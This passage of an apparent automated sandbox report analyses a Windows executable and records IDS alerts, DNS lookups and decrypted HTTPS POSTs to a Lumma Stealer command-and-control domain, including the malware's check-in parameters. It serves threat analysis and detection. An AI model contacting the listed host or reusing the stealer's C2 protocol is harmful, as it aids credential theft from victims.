                .data0x2e0000x47200x26007aa2770dfdc5d1f3b73ac58c354bf6b0False0.5197368421052632data5.33376168230909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x330000x9ee80xa00051f1c315bc5d47d692e1309577fd4585False0.233837890625data4.58267390896661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x3d0000x544000x5440053d87bacae729e1865703aa3b113122fFalse0.9501518453264095data7.994080139780744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_BITMAP0x3b4480x1428Device independent bitmap graphic, 80 x 16 x 32, image size 5120, resolution 3779 x 3779 px/mEnglishUnited States0.4238372093023256
                RT_ICON0x337280x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.15729806329711857
                RT_ICON0x379500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1928423236514523
                RT_ICON0x39ef80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.2621951219512195
                RT_ICON0x3afa00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.4725177304964539
                RT_DIALOG0x3c8700x266dataEnglishUnited States0.46742671009771986
                RT_DIALOG0x3cad80x134dataEnglishUnited States0.5064935064935064
                RT_GROUP_ICON0x3b4080x3edataEnglishUnited States0.8225806451612904
                RT_VERSION0x3cc100x2d8dataEnglishUnited States0.48214285714285715
                RT_MANIFEST0x332800x4a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.49580536912751677

                Imports

                DLLImport
                KERNEL32.dllGetFileSizeEx, GetProcAddress, GetModuleHandleW, GetPrivateProfileStringW, GetPrivateProfileIntW, SetEnvironmentVariableA, SetEndOfFile, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, SetStdHandle, LCMapStringW, CompareStringW, GetStringTypeW, OutputDebugStringW, LoadLibraryExW, WritePrivateProfileStringW, MultiByteToWideChar, GetLastError, CreateMutexW, LocalFree, GetCurrentDirectoryW, LocalAlloc, GetCommandLineW, GlobalFree, CloseHandle, MulDiv, lstrcatW, GetFullPathNameW, lstrcpyW, lstrlenW, GetModuleFileNameW, GetUserDefaultLangID, GetConsoleCP, GetTimeZoneInformation, ReadConsoleW, GetConsoleMode, LeaveCriticalSection, EnterCriticalSection, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, GetStdHandle, HeapAlloc, GetProcessHeap, GetCurrentProcess, WaitForSingleObject, WriteFile, ReadFile, CreateProcessW, CreateFileW, GetVersionExW, FindClose, GetModuleFileNameA, CreateDirectoryW, GetFileAttributesW, FindFirstFileW, FindNextFileW, HeapReAlloc, HeapFree, lstrcmpW, WideCharToMultiByte, IsDebuggerPresent, IsProcessorFeaturePresent, GetCommandLineA, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, InterlockedDecrement, ExitProcess, GetModuleHandleExW, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, InterlockedIncrement, GetCurrentThreadId, DeleteCriticalSection, GetFileType, CreateThread
                USER32.dllSetWindowPos, LoadImageW, EnumWindows, GetWindowTextW, EndDialog, SetForegroundWindow, PostMessageW, KillTimer, SetTimer, SetWindowLongW, GetDlgItemTextW, ShowWindow, IsIconic, wsprintfW, EnableWindow, GetMenu, GetSubMenu, MessageBoxW, DialogBoxParamW, DestroyMenu, TrackPopupMenu, GetWindowLongW, InsertMenuItemW, CheckMenuRadioItem, InsertMenuW, CreatePopupMenu, GetMessagePos, LoadIconW, SetWindowTextW, SendMessageW, GetDlgItem, SetDlgItemTextW
                GDI32.dllDeleteObject, CreateFontIndirectW, GetObjectW, SetBkMode
                COMDLG32.dllGetSaveFileNameW
                COMCTL32.dllImageList_LoadImageW, ImageList_Draw
                ADVAPI32.dllRegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegOpenKeyExW, RegCloseKey, RegOpenKeyW
                SHELL32.dllSHGetFolderPathW, DragQueryFileW, DragFinish, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteW, CommandLineToArgvW, DragAcceptFiles
                ole32.dllCoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemFree
                SHLWAPI.dllPathCanonicalizeW, PathCombineW, PathIsRelativeW

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/02/24-08:32:58.581071TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49712443192.168.2.5172.67.141.234
                07/02/24-08:32:52.825231TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49708443192.168.2.5172.67.141.234
                07/02/24-08:33:01.124383TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49719443192.168.2.5172.67.141.234
                07/02/24-08:33:03.978479TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49724443192.168.2.5172.67.141.234
                07/02/24-08:32:51.867332UDP2054180ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (contintnetksows .shop)6267053192.168.2.51.1.1.1
                07/02/24-08:32:55.875122TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49710443192.168.2.5172.67.141.234
                07/02/24-08:32:54.529233TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49709443192.168.2.5172.67.141.234
                07/02/24-08:32:51.904360TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49707443192.168.2.5172.67.141.234
                07/02/24-08:32:56.961593TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49711443192.168.2.5172.67.141.234
                07/02/24-08:32:59.582392TCP2054181ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI)49714443192.168.2.5172.67.141.234

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 08:32:51.902865887 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:51.902915955 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:51.902996063 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:51.904360056 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:51.904393911 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.386466980 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.386542082 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.392328978 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.392342091 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.392667055 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.448009968 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.448585987 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.448602915 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.448755980 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.816215992 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.816312075 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.816400051 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.818577051 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.818599939 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.818613052 CEST49707443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.818619013 CEST44349707172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.824717999 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.824765921 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:52.824906111 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.825231075 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:52.825247049 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.301256895 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.301407099 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.302980900 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.302988052 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.303219080 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.304645061 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.304658890 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.304708004 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989396095 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989476919 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989506960 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989550114 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.989561081 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989572048 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989630938 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989665985 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.989665985 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.989681959 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989837885 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.989948034 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.989955902 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.990312099 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.990437031 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.990446091 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.994128942 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:53.994189978 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:53.994201899 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.041719913 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.265539885 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.265618086 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.265649080 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.265733004 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.265747070 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.265799999 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.383409023 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.383433104 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.383486032 CEST49708443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.383492947 CEST44349708172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.528671980 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.528717041 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:54.528812885 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.529232979 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:54.529247046 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.012471914 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.012542009 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.013901949 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.013916969 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.014153004 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.015654087 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.015800953 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.015820980 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.698261976 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.698365927 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.698426008 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.698544979 CEST49709443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.698565006 CEST44349709172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.874569893 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.874609947 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:55.874736071 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.875122070 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:55.875133991 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.346931934 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.347047091 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.348676920 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.348697901 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.348925114 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.350251913 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.350393057 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.350413084 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.350464106 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.350472927 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.757782936 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.757894993 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.758058071 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.758308887 CEST49710443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.758333921 CEST44349710172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.961066961 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.961106062 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:56.961178064 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.961592913 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:56.961606026 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.430356979 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.430433989 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.432579041 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.432590961 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.432832003 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.434371948 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.434415102 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.434441090 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.434509993 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.434520960 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.961129904 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.961229086 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:57.961390018 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.961669922 CEST49711443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:57.961687088 CEST44349711172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:58.580569983 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:58.580609083 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:58.580724955 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:58.581070900 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:58.581087112 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.059777975 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.059926987 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.061441898 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.061456919 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.061744928 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.063007116 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.063111067 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.063159943 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.468933105 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.469038010 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.469127893 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.481806993 CEST49712443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.481834888 CEST44349712172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.581898928 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.581950903 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:32:59.582032919 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.582391977 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:32:59.582406044 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.076350927 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.076463938 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.077837944 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.077856064 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.078145981 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.079432011 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.079566956 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.079576969 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.451354027 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.451452017 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:00.451508999 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.451680899 CEST49714443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:00.451704025 CEST44349714172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.123756886 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.123825073 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.123900890 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.124382973 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.124397993 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.590842962 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.591789007 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.592406034 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.592426062 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.592677116 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.594969034 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.594969034 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.595012903 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.595408916 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.595484972 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.595635891 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.595674992 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.595794916 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.595820904 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.596003056 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596040964 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.596199036 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596218109 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.596230984 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596241951 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.596369982 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596395969 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.596419096 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596770048 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.596807003 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.605206966 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.605448008 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.605472088 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:01.605494022 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.605518103 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.605587959 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:01.610184908 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:03.898973942 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:03.899059057 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:03.899106979 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:03.899801016 CEST49719443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:03.899821043 CEST44349719172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:03.977654934 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:03.977701902 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:03.977834940 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:03.978478909 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:03.978496075 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.445877075 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.446024895 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.447602034 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.447634935 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.447909117 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.458805084 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.458880901 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.458924055 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.834367037 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.834479094 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.834557056 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.834808111 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.834840059 CEST44349724172.67.141.234192.168.2.5
                Jul 2, 2024 08:33:04.834850073 CEST49724443192.168.2.5172.67.141.234
                Jul 2, 2024 08:33:04.834856033 CEST44349724172.67.141.234192.168.2.5

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 08:32:51.867331982 CEST6267053192.168.2.51.1.1.1
                Jul 2, 2024 08:32:51.881201982 CEST53626701.1.1.1192.168.2.5

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 2, 2024 08:32:51.867331982 CEST192.168.2.51.1.1.10xd818Standard query (0)contintnetksows.shopA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 2, 2024 08:32:51.881201982 CEST1.1.1.1192.168.2.50xd818No error (0)contintnetksows.shop172.67.141.234A (IP address)IN (0x0001)false
                Jul 2, 2024 08:32:51.881201982 CEST1.1.1.1192.168.2.50xd818No error (0)contintnetksows.shop104.21.79.40A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • contintnetksows.shop

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549707172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:52 UTC267OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: contintnetksows.shop
                2024-07-02 06:32:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-07-02 06:32:52 UTC818INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=i90u6uqmntbmbijvrr947uilde; expires=Sat, 26-Oct-2024 00:19:31 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2MGSxML4jrrNnA%2FvbT251GmtAm8i%2BPGEe7spD%2BmxCN3cAf1%2FvI%2Btsw0%2FvrZMhNWUF2BIXgGdG6WdBK9kAhhFE4uDApvbn%2BwT%2FEMWc7zBYh4QkBXipzH6Ym1nLqf4NzRPR4ABZKWWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99e01cc18cba-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:52 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                Data Ascii: 2ok
                2024-07-02 06:32:52 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.549708172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:32:53 UTC268OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 42
                Host: contintnetksows.shop
                2024-07-02 06:32:53 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 53 31 5a 72 6c 48 2d 2d 26 6a 3d
                Data Ascii: act=recive_message&ver=4.0&lid=S1ZrlH--&j=
                2024-07-02 06:32:53 UTC814INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:53 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=io86bsllqtfirfknjnbh32g4vk; expires=Sat, 26-Oct-2024 00:19:32 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2YG%2F42dFWdbEQ4JCY%2FxMqF%2Bss9uoJGgKmMIFipcw9TViMHe%2FyafHl3Z9CV60u5SYqQ87JNThtlQg8zVSkc2z2qwXDcCrwUIke8FaiJMiHYUKFpN5XRp%2Ba0q28%2BFjxlnUUbnmWLzKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
